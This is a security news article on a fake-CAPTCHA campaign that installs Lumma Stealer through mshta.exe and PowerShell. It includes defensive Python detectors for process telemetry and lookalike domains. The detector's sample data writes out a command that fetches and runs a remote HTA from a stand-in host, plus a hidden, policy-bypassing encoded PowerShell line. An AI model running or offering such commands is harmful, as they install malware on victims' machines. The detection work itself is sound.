A malware campaign is targeting organizations worldwide with fake CAPTCHA pages that trick users into running a command on their own Windows machines. The command installs Lumma Stealer, an information-stealing malware, and the campaign has already hit healthcare, banking and telecom, among other sectors. Security researchers are warning organizations to stay alert as both the lures and the loader chain grow more sophisticated.
The Malware Campaign and Its Global Reach
The campaign relies on a bogus "verify you are human" check. A user who visits a compromised website is shown a page styled as a CAPTCHA, but instead of a puzzle it presents a command and instructs the user to run it on their Windows system, typically by copying it and pasting it into the Run dialog. Executing that command is what installs the malware; the victim does the work that an exploit or a downloaded file would otherwise have to do.
This campaign is active in countries such as Argentina, Colombia, the United States, and the Philippines. The attackers target multiple industries, including healthcare, banking, marketing, and telecom. The telecom sector has been hit the hardest.
How the Attack Works
The attack chain starts when a user lands on a compromised website and is redirected to the fake CAPTCHA page. The page asks the user to run a command that invokes mshta.exe, the Microsoft HTML Application host. mshta.exe is a signed binary that ships with Windows and will fetch and execute an HTA file straight from a URL, which is why attackers favor it: nothing has to be saved through the browser, and to the victim the command looks like one line of "verification" text.
The command downloads and runs a malicious HTA file from an attacker-controlled server. The HTA launches PowerShell, and that script unpacks further obfuscated scripts which decode and load Lumma Stealer as the final stage.
The PowerShell stages also carry an Antimalware Scan Interface (AMSI) bypass, so the decoded script content is not handed to the endpoint's antivirus engine for inspection when it runs. The social-engineering side of the chain evades a different layer: because the victim performs the steps outside the browser, download scanning and Mark-of-the-Web based warnings never fire, since no file passes through the browser at all.
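The chain above leaves a distinctive trace in process-creation telemetry. The Python below is an added example, not code from the article or from any vendor, of checking for that trace: it flags mshta.exe started with a URL on its command line and PowerShell whose parent is mshta.exe, and it links the two through the parent process ID so the alert carries the HTA URL. The input is a handful of constructed Sysmon Event ID 1 style records; the Sysmon field names are real, but the paths, PIDs, domain and encoded string are invented sample data.

```python
import re

# Constructed Sysmon Event ID 1 style records (invented sample data, not real telemetry).
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentProcessId": 900,
     "Image": r"C:\Windows\explorer.exe",
     "ParentImage": r"C:\Windows\System32\userinit.exe",
     "CommandLine": "explorer.exe"},
    # The user pasted the fake-CAPTCHA command into the Run dialog:
    # explorer.exe spawns mshta.exe with a remote URL as its only argument.
    {"ProcessId": 5200, "ParentProcessId": 4120,
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://captcha-verify.example/verify.hta"},
    # The HTA launches a hidden, policy-bypassing, encoded PowerShell stage.
    {"ProcessId": 5288, "ParentProcessId": 5200,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    # A local HTA started by an admin script: no remote URL, must not fire the URL rule.
    {"ProcessId": 6001, "ParentProcessId": 5900,
     "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'mshta.exe "C:\ProgramData\Vendor\setup.hta"'},
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
PS_IMAGES = {"powershell.exe", "pwsh.exe"}
# Switches the loader stage relies on: encoded payload, hidden window, bypassed execution policy.
PS_FLAG_RE = re.compile(
    r"-(?:enc|encodedcommand|e|ec)\b|-w(?:indowstyle)?\s+hidden|-e(?:xecutionpolicy|p)\s+bypass",
    re.IGNORECASE,
)


def basename(path):
    """Last path component, lowercased, so Image fields compare by executable name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_fake_captcha_chain(events):
    """Return one finding per mshta.exe given a remote URL and per PowerShell spawned by mshta.exe."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    findings = []
    for ev in events:
        image = basename(ev["Image"])
        parent = basename(ev["ParentImage"])
        cmd = ev["CommandLine"]
        if image == "mshta.exe":
            url = URL_RE.search(cmd)
            if url:
                findings.append({"rule": "mshta_remote_hta", "pid": ev["ProcessId"],
                                 "parent": parent, "evidence": url.group(0)})
        elif image in PS_IMAGES and parent == "mshta.exe":
            flags = [f.lower() for f in PS_FLAG_RE.findall(cmd)]
            # Walk up to the mshta.exe parent so the alert names the HTA it was launched with.
            mshta_ev = by_pid.get(ev["ParentProcessId"], {})
            url = URL_RE.search(mshta_ev.get("CommandLine", ""))
            findings.append({"rule": "powershell_child_of_mshta", "pid": ev["ProcessId"],
                             "parent": parent, "evidence": " ".join(flags),
                             "hta_url": url.group(0) if url else None})
    return findings


if __name__ == "__main__":
    for finding in detect_fake_captcha_chain(SAMPLE_EVENTS):
        print(finding)
```

The URL rule is deliberately narrow: mshta.exe running a local .hta is common enough in enterprise tooling that alerting on every mshta.exe launch drowns the signal, whereas mshta.exe with an http(s) URL on its command line, or PowerShell whose parent is mshta.exe, is rare in legitimate use and is exactly what this lure produces.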
The Lumma Stealer Malware
Lumma Stealer is an information stealer sold as Malware-as-a-Service (MaaS): the operators maintain the malware and its infrastructure, and affiliates rent access and run their own campaigns. It harvests browser-stored credentials, session cookies and cryptocurrency wallet data, and it has been very active in recent months.
Affiliates deliver it through a variety of lures and loaders, which is precisely what makes it hard to detect and block by signature alone: there is no single delivery chain to watch for.
Fake Domains and New Delivery Methods
Attackers also spread Lumma Stealer through fake domains that impersonate legitimate websites such as Reddit and WeTransfer. Users who land on these lookalike sites are tricked into downloading password-protected archives.
The password protection is a deliberate choice: mail and web gateways cannot open the archive to scan its contents, so the dropper inside reaches the user unscanned and, once extracted and run, executes Lumma Stealer. Researchers have identified more than 1,000 counterfeit domains used this way.
The same playbook was seen in 2023, when attackers registered more than 1,300 fake domains impersonating AnyDesk to distribute the Vidar Stealer.
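Lookalike domains of this kind can be screened before a user reaches them, for instance from DNS or proxy logs. The Python below is an added example, not the researchers' or the article's code: it normalizes each hostname (lowercasing, punycode decoding, a small homoglyph and digit-substitution table), reduces it to a registrable domain with a naive last-two-labels rule, and flags any hostname whose labels spell an impersonated brand unless the registrable domain is on an allowlist. The allowlist, the confusable table and the sample hostnames are all constructed for this example; a production version would use a public suffix list and a full confusables table.

```python
import unicodedata

# Illustrative allowlist (an assumption for this example): registrable domains that may
# legitimately carry each impersonated brand name. A real deployment loads its own list.
BRAND_ALLOWLIST = {
    "reddit": {"reddit.com", "redd.it"},
    "wetransfer": {"wetransfer.com"},
    "anydesk": {"anydesk.com"},
}

# Characters commonly swapped in for Latin letters: a few digits and Cyrillic homoglyphs.
# Constructed for this example; a real scanner would use a complete confusables table.
CONFUSABLES = str.maketrans({
    "0": "o", "3": "e", "4": "a", "5": "s", "7": "t",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",
    "\u0441": "c", "\u0443": "y", "\u0456": "i",
})

# Constructed sample hostnames on reserved TLDs (.example/.test), not real sites.
SAMPLE_HOSTS = [
    "www.reddit.com",
    "reddit-files.example",
    "r\u0435ddit.example",           # Cyrillic 'е' in place of Latin 'e'
    "reddit.com.evil.test",          # brand buried in a subdomain of an unrelated domain
    "login.wetransfer-share.test",
    "xn--mnchen-3ya.de",             # punycode for münchen.de, unrelated
    "example.org",
]


def split_labels(host):
    """Lowercase, strip a trailing dot and decode punycode labels so homoglyphs become visible."""
    labels = host.lower().rstrip(".").split(".")
    return [l.encode("ascii").decode("idna") if l.startswith("xn--") else l for l in labels]


def registrable_domain(labels):
    """Naive eTLD+1: the last two labels. Assumption: adequate for .com-style TLDs;
    multi-label suffixes such as co.uk need a public suffix list."""
    return ".".join(labels[-2:])


def skeleton(label):
    """Collapse a label to the letters a victim reads: fold compatibility forms,
    map confusables to Latin, and drop separators used as padding (reddit-files)."""
    folded = unicodedata.normalize("NFKC", label).translate(CONFUSABLES)
    return folded.replace("rn", "m").replace("vv", "w").replace("-", "").replace("_", "")


def classify(host):
    """Return (verdict, brand): 'legit' for an allowlisted registrable domain,
    'lookalike' when any non-TLD label spells a brand, otherwise 'unrelated'."""
    labels = split_labels(host)
    reg = registrable_domain(labels)
    for brand, allowed in BRAND_ALLOWLIST.items():
        if reg in allowed:
            return "legit", brand
    for brand in BRAND_ALLOWLIST:
        if any(brand in skeleton(label) for label in labels[:-1]):
            return "lookalike", brand
    return "unrelated", None


def find_lookalikes(hosts):
    """Reduce a list of observed hostnames (DNS or proxy logs) to the suspicious ones."""
    return [(h, classify(h)[1]) for h in hosts if classify(h)[0] == "lookalike"]


if __name__ == "__main__":
    for host in SAMPLE_HOSTS:
        print(f"{host:32} {classify(host)}")
```

Substring matching over-alerts by design (a word that merely contains a brand string will be flagged), which is the right trade-off for a triage feed that a human or a reputation lookup reviews afterwards; the allowlist check runs first so that legitimate subdomains of the real brand are never flagged.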
Advanced Tactics in Phishing-as-a-Service (PhaaS)
A related threat is Tycoon 2FA, a Phishing-as-a-Service kit rented to criminals who want phishing pages that defeat multi-factor authentication by sitting between the victim and the real login service and capturing the authenticated session.
The kit is built to slip past defenses at several points. It sends phishing mail from real, often compromised, email accounts so the messages pass sender-reputation checks; it fingerprints visitors to recognize automated security scanners and serve them harmless content; and it disables right-click menus and similar page features to hinder inspection of the phishing page.
Social Engineering via Gravatar
Attackers are also using Gravatar profiles for credential harvesting. Gravatar is a legitimate avatar and profile service, but criminals abuse it to create profiles that mimic AT&T, Comcast, Proton Mail and other brands.
Because the profile is hosted on a trusted service, it looks convincing, and its content steers users toward handing over their login details. It is another layer of deception on top of the fake domains and phishing mail.
Why This Campaign Is Dangerous
This campaign is highly dangerous because it combines multiple techniques. It uses fake CAPTCHA pages, phishing tactics, and fake domains. These methods make it harder for victims to spot and for security tools to detect.
The use of Malware-as-a-Service further complicates the situation. It allows attackers with little technical knowledge to launch sophisticated attacks.
How to Protect Yourself and Your Organization
- Never run a command because a web page or a CAPTCHA told you to. A genuine CAPTCHA never asks you to open the Run dialog, a terminal or PowerShell, and any page that does is the attack itself.
- Block mshta.exe with application control (AppLocker or Windows Defender Application Control) on machines that have no business need for HTML Applications, and alert on mshta.exe being passed a URL or on PowerShell whose parent process is mshta.exe.
- Keep antivirus and operating systems updated, and run an endpoint product that integrates with AMSI, since the PowerShell stages of this chain are built to dodge it.
- Educate employees about phishing and social engineering, using this specific "paste the verification command" lure as a training example.
- Use email and web filtering to block phishing attempts, and treat password-protected archives from unknown senders as suspicious, because the gateway cannot scan their contents.
- Monitor endpoints and the network for unusual activity. On a suspect Windows machine, the Run dialog history under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU shows what the user pasted.
Conclusion
The fake CAPTCHA campaign is a reminder of how cyber threats are evolving. Attackers now use sophisticated techniques to trick users and evade detection. Organizations must strengthen their cybersecurity measures to stay protected.